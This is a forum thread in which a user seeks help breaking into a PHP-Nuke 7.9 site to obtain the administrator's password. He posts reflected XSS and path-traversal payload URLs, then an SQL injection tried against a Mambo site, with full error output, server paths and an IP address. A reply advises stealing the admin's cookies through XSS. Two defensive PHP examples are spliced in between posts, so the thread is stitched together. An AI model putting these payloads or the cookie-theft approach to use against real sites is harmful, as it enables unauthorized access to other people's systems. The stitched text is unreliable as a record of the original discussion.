
View Full Version : Getting the admin password in PHP-Nuke 7.9


{BuT@Min}
23.11.2006, 16:38
So, after watching a video on breaking into Nuke 7.8, I tried some of what is described there.
Passive XSS:
1) (the username parameter)
http://ya.ru/nuke/modules.php?name=Your_Account&code=ggg&op=mailpasswd&username=<h1>[XSS] - response: Registration code for [XSS] has been sent.

2) (leaky search)
search"style="background:url(javascript:alert()) - gave an error in an empty window.

3) http://[target]/[nuke_dir]/modules.php?name=Search
&file=../../../../../../ ../../../etc/passwd%00 - says: You are so cool...

4) http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=[our query]
- response:

Search results

Nothing found for your query

999999999 Previous

5) http://[target]/nuke75/index.php?inside_mod=1 - response: The html tags you attempted to use are not allowed [ Go Back ]

That's about it. Please tell me how I can use this to find out the admin's password; I already know the login.
If possible, describe it in more detail...
P.S. Sorry for the clumsy explanation. Thanks in advance for the help.

bul.666
23.11.2006, 16:48
gave an error in an empty window.
Hmm... that IS JavaScript! In short, there's an XSS vulnerability here....
response: The html tags you attempted to use are not allowed [ Go Back ]
There's filtering here...
says: You are so cool...
Here too...

In short, read up on XSS and you'll understand how to steal the admin's cookies with it...
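From the defender's side, the two reflection points from the first post (the `username` value echoed in the mailpasswd message, and the `min` value echoed by the Search pager) and the cookie-theft concern raised in the reply come down to output encoding and cookie flags. The following is an added example, not PHP-Nuke's own code: the function names, message text and pager markup are illustrative, and only the parameter names and the sample inputs come from the post.

```php
<?php
// Added example (not PHP-Nuke code): encode reflected parameters before
// echoing them, and keep the session cookie out of reach of page scripts.
// esc(), mailpasswd_message() and search_pager() are illustrative names.

// Mark the session cookie HttpOnly so a reflected script cannot read it.
ini_set('session.cookie_httponly', '1');

function esc(string $s): string
{
    // ENT_QUOTES also covers the attribute context (the search"style=...
    // payload from the post), not only the element context (<h1>...).
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The mailpasswd confirmation, with the username encoded instead of raw.
function mailpasswd_message(string $username): string
{
    return 'Registration code for ' . esc($username) . ' has been sent.';
}

// The Search "Previous" link: min must be a non-negative integer; anything
// else is replaced by 0 rather than echoed back into the page.
function search_pager(string $min): string
{
    $offset = filter_var($min, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($offset === false) {
        $offset = 0;
    }
    return '<a href="modules.php?name=Search&amp;min=' . $offset . '">'
         . $offset . ' Previous</a>';
}

// Constructed inputs mirroring the values tried in the post.
echo mailpasswd_message('<h1>[XSS]'), "\n";
echo search_pager('999999999[XSS]'), "\n";
```

Run it from the command line with `php` to see that the `<h1>` tag comes back as entities and the non-numeric `min` value never reaches the markup.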

{BuT@Min}
24.11.2006, 11:45
So I read some articles on XSS, didn't understand everything of course, but I managed to set up a sniffer. The only problem now is how to get a link to it onto the site :confused: .

By the way, another question came up here, about Mambo. There's a site running Mambo, and I entered:

http://сайт.ru/index.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=[sql]/*
in response:

Notice: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[sql]/*, lastip = '85.140.29.41' WHERE content_id = 1' at lin in /home/c/cайт.h16.ru/WWW/includes/database.php on line 184

UPDATE mos_content_rating
SET rating_count = rating_count + 1,
rating_sum = rating_sum + 1,rating_count=[sql]/*,
lastip = МОЙ АЙПИ
WHERE content_id = 1

/home/c/сайт.ru/WWW/components/com_content/content.php:1426
/home/c/сайт.h16.ru/WWW/components/com_content/content.php:96
/home/c/сайт.h16.ru/WWW/index.php:180DB function failed with error number 1064
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1' at lin SQL=UPDATE mos_content_rating SET rating_count = rating_count + 1, rating_sum = rating_sum + 1,rating_count=[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1
I think this is a hole???
By the way, on their main page this stuff shows up
at the bottom:

37 queries executed
1
SELECT template FROM mos_templates_menu WHERE client_id='0' AND menuid='0'--------------------------------------------------------------------------------2
DELETE FROM mos_session
WHERE (time < 1164353432)--------------------------------------------------------------------------------3
SELECT * FROM mos_session WHERE session_id='53399328d45328e8a9f739413b1596c2'--------------------------------------------------------------------------------4
UPDATE mos_session SET `time`='1164354332',`userid`='0',`usertype`='',`us ername`='',`gid`='0',`guest`='1' WHERE session_id='53399328d45328e8a9f739413b1596c2'--------------------------------------------------------------------------------5
SELECT folder, element, published, CONCAT_WS('/',folder,element) AS lookup
FROM mos_mambots
WHERE published >= 1 AND access <= 0 AND folder='editors'
ORDER BY ordering--------------------------------------------------------------------------------6
SELECT folder, element, published, CONCAT_WS('/',folder,element) AS lookup
FROM mos_mambots
WHERE published >= 1 AND access <= 0 AND folder='editors-xtd'
ORDER BY ordering--------------------------------------------------------------------------------7
SELECT access FROM mos_menu WHERE link like 'index.php?option=com_poll&task=results%'--------------------------------------------------------------------------------8
SELECT * FROM mos_polls WHERE id='14'--------------------------------------------------------------------------------9
SELECT MIN(date) AS mindate, MAX(date) AS maxdate
FROM mos_poll_date
WHERE poll_id='14'--------------------------------------------------------------------------------10
SELECT a.text, count( DISTINCT b.id ) AS hits, count( DISTINCT b.id )/COUNT( DISTINCT c.id )*100.0 AS percent
FROM mos_poll_data AS a
LEFT JOIN mos_poll_date AS b ON b.vote_id = a.id
LEFT JOIN mos_poll_date AS c ON c.poll_id = a.pollid
WHERE a.pollid='14' AND a.text <> ''
GROUP BY a.id
ORDER BY a.id--------------------------------------------------------------------------------11
SELECT id, title
FROM mos_polls
WHERE published=1
ORDER BY id--------------------------------------------------------------------------------12
SELECT * FROM mos_menu WHERE id='0'--------------------------------------------------------------------------------13
SELECT id, title, module, position, content, showtitle, params
FROM mos_modules AS m, mos_modules_menu AS mm
WHERE m.published='1' AND m.access <= '0' AND m.client_id='0'
AND mm.moduleid=m.id
AND (mm.menuid = '0' OR mm.menuid = '0')
ORDER BY ordering--------------------------------------------------------------------------------14
SELECT id, link
FROM mos_menu
WHERE menutype='mainmenu' AND published='1'
ORDER BY parent, ordering LIMIT 1--------------------------------------------------------------------------------15
SELECT id, name, link, parent, type
FROM mos_menu
WHERE published='1'
ORDER BY parent, ordering--------------------------------------------------------------------------------16
SELECT m.* FROM mos_menu AS m
WHERE menutype='topmenu' AND published='1' AND access <= '0' AND parent='0'
ORDER BY ordering--------------------------------------------------------------------------------17
SELECT m.* FROM mos_menu AS m
WHERE menutype='mainmenu' AND published='1' AND access <= '0'
ORDER BY parent,ordering--------------------------------------------------------------------------------18
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=24'--------------------------------------------------------------------------------19
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=24'--------------------------------------------------------------------------------20
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=21'--------------------------------------------------------------------------------21
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=21'--------------------------------------------------------------------------------22
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=20'--------------------------------------------------------------------------------23
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=20'--------------------------------------------------------------------------------24
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=23'--------------------------------------------------------------------------------25
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=23'--------------------------------------------------------------------------------26
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=22'--------------------------------------------------------------------------------27
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=22'--------------------------------------------------------------------------------28
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=25'--------------------------------------------------------------------------------29
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=25'--------------------------------------------------------------------------------30
SELECT m.* FROM mos_menu AS m
WHERE menutype='othermenu' AND published='1' AND access <= '0'
ORDER BY parent,ordering--------------------------------------------------------------------------------31
SELECT count(*) AS numrows FROM mos_banner WHERE showBanner=1--------------------------------------------------------------------------------32
SELECT * FROM mos_banner WHERE showBanner=1
LIMIT 0,1--------------------------------------------------------------------------------33
SELECT p.id, p.title
FROM mos_poll_menu AS pm, mos_polls AS p
WHERE (pm.menuid='0' OR pm.menuid='0') AND p.id=pm.pollid
AND p.published=1--------------------------------------------------------------------------------34
SELECT id, text FROM mos_poll_data
WHERE pollid='14' AND text <> ''
ORDER BY id--------------------------------------------------------------------------------35
SELECT count(session_id) as guest_online FROM mos_session WHERE guest=1 AND (usertype is NULL OR usertype='')--------------------------------------------------------------------------------36
SELECT DISTINCT count(username) as user_online FROM mos_session WHERE guest=0 AND usertype <> 'administrator' AND usertype <> 'superadministrator'--------------------------------------------------------------------------------37
SELECT DISTINCT a.username
FROM mos_session AS a
WHERE (a.guest=0)

I think it's the same hole, though I may be wrong :(
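The error output quoted above shows the `user_rating` value being placed directly into the `UPDATE mos_content_rating` statement, and the 37-query listing on the front page reads like SQL debug output left enabled in production. The following is an added example, not Mambo's own code: it shows a hardened shape for that rating update, assuming a mysqli connection and the `mos_content_rating` columns exactly as they appear in the quoted SQL; the function names are illustrative.

```php
<?php
// Added example (not Mambo code): a hardened rating update for the query
// whose failed text appears in the error output above.
// Assumed: a mysqli connection and the mos_content_rating table with the
// columns shown there. validate_rating_params()/rate_content() are
// illustrative names.

// Returns [content_id, rating] as ints, or null if either value is not a
// plain integer in range. A value like "1,rating_count=[sql]/*" fails here.
function validate_rating_params($cid, $user_rating): ?array
{
    $id = filter_var($cid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $rating = filter_var($user_rating, FILTER_VALIDATE_INT,
                         ['options' => ['min_range' => 1, 'max_range' => 5]]);
    if ($id === false || $rating === false) {
        return null;
    }
    return [$id, $rating];
}

function rate_content(mysqli $db, $cid, $user_rating, string $ip): bool
{
    $params = validate_rating_params($cid, $user_rating);
    if ($params === null || filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return false;
    }
    [$id, $rating] = $params;

    // Values are bound, never concatenated, so the statement text is fixed.
    $stmt = $db->prepare(
        'UPDATE mos_content_rating'
        . ' SET rating_count = rating_count + 1,'
        . ' rating_sum = rating_sum + ?,'
        . ' lastip = ?'
        . ' WHERE content_id = ?'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('isi', $rating, $ip, $id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Constructed inputs: the injected value from the post is rejected before
// any SQL is built; an ordinary vote passes validation.
var_dump(validate_rating_params('1', '1,rating_count=[sql]/*'));
var_dump(validate_rating_params('1', '4'));
```

The validation step alone can be run without a database (`php` on the file prints `NULL` for the first call and a two-element array for the second); `rate_content()` needs a live mysqli connection. Turning off the debug query listing is a separate configuration change, not something this code does.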

{BuT@Min}
24.11.2006, 11:48
By the way, how can I find out the Mambo version?????

SK | Heaton
24.11.2006, 12:36
3) http://[target]/[nuke_dir]/modules.php?name=Search
&file=../../../../../../ ../../../etc/passwd%00 - says: You are so cool...

this guy is hilarious =))

{BuT@Min}
24.11.2006, 21:16
this guy is hilarious =))
What do you mean by that???

Well, on topic, can anyone at least answer???